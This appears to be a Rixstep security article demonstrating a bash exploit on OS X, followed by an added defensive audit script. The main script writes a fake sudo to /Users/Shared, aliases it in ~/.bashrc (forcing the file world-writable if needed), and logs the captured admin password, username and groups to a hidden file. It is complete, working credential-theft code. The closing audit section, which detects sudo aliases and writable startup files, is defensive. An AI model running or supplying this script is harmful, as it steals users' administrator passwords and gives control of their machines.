Rixstep

Way Too Much Sudo Fun

Bashing bash again because it's so much fun and above all so easy.


As demonstrated in 'Sudo Fun', it's possible to hijack use of the Unix sudo to obtain less than optimal results. OS X boxes can, in other words, be compromised in a number of ways.

As demonstrated in 'Too Much Sudo Fun', it's possible to humiliate bash with little risk that the maintainers will do anything about it. ~/.bash_profile is used to accomplish this.

But it turns out even ~/.bashrc can be made into a turkey. And that's demonstrated here and now.

#! /bin/bash

userhome="/Users/`whoami`"

fakesudo="/Users/Shared/sudo"
logfile="/Users/Shared/.keylog"
target="$userhome/.bashrc"

if [ -f $target ]; then
    if [ ! -w $target ]; then
        chmod a+w $target 2>/dev/null || exit 1
    fi
else
    touch $target 2>/dev/null || exit 1
fi

grep -sq sudo $target || cat <<EOF >>$target
if [ -x $fakesudo ]; then
    alias sudo="$fakesudo"
fi
EOF

if [ -f "$fakesudo" ]; then
    rm -f "$fakesudo" 2>/dev/null
fi

touch "$fakesudo"
chmod a+x "$fakesudo"

echo '#! /bin/bash'>>"$fakesudo"
echo '#'>>"$fakesudo"
echo 'inp=""'>>"$fakesudo"

echo 'stty -echo'>>"$fakesudo"
echo 'read -p "Password:" inp'>>"$fakesudo"
echo 'stty  echo'>>"$fakesudo"
echo 'echo'>>"$fakesudo"

echo 'logfile="/Users/Shared/.keylog" '>>"$fakesudo"
echo 'echo "$inp">>"$logfile"'>>"$fakesudo"
echo 'echo `whoami`>>"$logfile" '>>"$fakesudo"
echo 'echo `groups`>>"$logfile" '>>"$fakesudo"
echo 'echo "Sorry, try again."'>>"$fakesudo"

echo '/usr/bin/sudo "$@"'>>"$fakesudo"

echo 'rm -f "/Users/Shared/sudo"'>>"$fakesudo"
echo 'bash ' >> $fakesudo
echo 'exit 0'>>"$fakesudo"

bash
exit 0

There are a few caveats with this exploit but it does prove a point. Namely that it's all too easy - not with OS X but with bash - to own a machine.
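The trick above rests on two conditions that are easy to audit from the other side: a shell startup file that redefines sudo, and a startup file that has been made writable so the alias could be appended. The following is an added example and not part of the original article or its script: a small POSIX sh audit that reports both conditions for a given file, and runs itself against a constructed ~/.bashrc carrying the alias shown above. All paths and sample contents are constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not code from the original article: audit a shell startup
# file for the two things the script above relies on, a redefinition of sudo
# and write access for anyone but the owner. Paths and sample contents are
# constructed for this demonstration.

# Print "sudo-redefined" when FILE aliases or defines a shell function named
# sudo, otherwise "clean". A missing file counts as clean.
# Matched forms:  alias sudo=...   sudo() {   function sudo
sudo_redefined_in() {
    if [ -f "$1" ] && grep -Eq \
        '^[[:space:]]*(alias[[:space:]]+sudo=|sudo[[:space:]]*\(\)|function[[:space:]]+sudo([[:space:]]|$))' \
        "$1"; then
        echo "sudo-redefined"
    else
        echo "clean"
    fi
}

# Print "group-or-world-writable" when FILE grants write access to group or
# others (the script above does "chmod a+w" on ~/.bashrc when it has to),
# "missing" when FILE does not exist, otherwise "ok". The mode string from
# ls -l is used so the check works with both GNU and BSD userland.
writable_by_others() {
    mode=$(ls -ld "$1" 2>/dev/null | cut -c1-10)
    case "$mode" in
        "")                  echo "missing" ;;
        ?????w*|????????w?)  echo "group-or-world-writable" ;;
        *)                   echo "ok" ;;
    esac
}

# One-line verdict combining both checks for FILE.
audit_rc_file() {
    echo "$1: $(sudo_redefined_in "$1") $(writable_by_others "$1")"
}

# Demonstration on a constructed startup file that carries the injected
# alias from the article, with the file left world-writable as the script
# above leaves it.
demo_audit() {
    tmp=$(mktemp) || return 1
    printf 'export PATH="$HOME/bin:$PATH"\n' > "$tmp"
    printf 'if [ -x /Users/Shared/sudo ]; then\n    alias sudo="/Users/Shared/sudo"\nfi\n' >> "$tmp"
    chmod 666 "$tmp"
    audit_rc_file "$tmp"
    rm -f "$tmp"
}

demo_audit
```

Run it over ~/.bashrc and ~/.bash_profile (and, since the alias only takes effect in an interactive shell, compare with what `type sudo` reports in a fresh terminal). In an interactive bash, `\sudo` or `command sudo` bypasses any alias, so either form is a quick way to confirm what a bare `sudo` would actually run.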

See Also
Sudo Fun
ACP Services
Resolve Path
Too Much Sudo Fun


Thanks again to GC at the CLIX Exchange for pulling another all nighter.

Copyright © Rixstep. All rights reserved.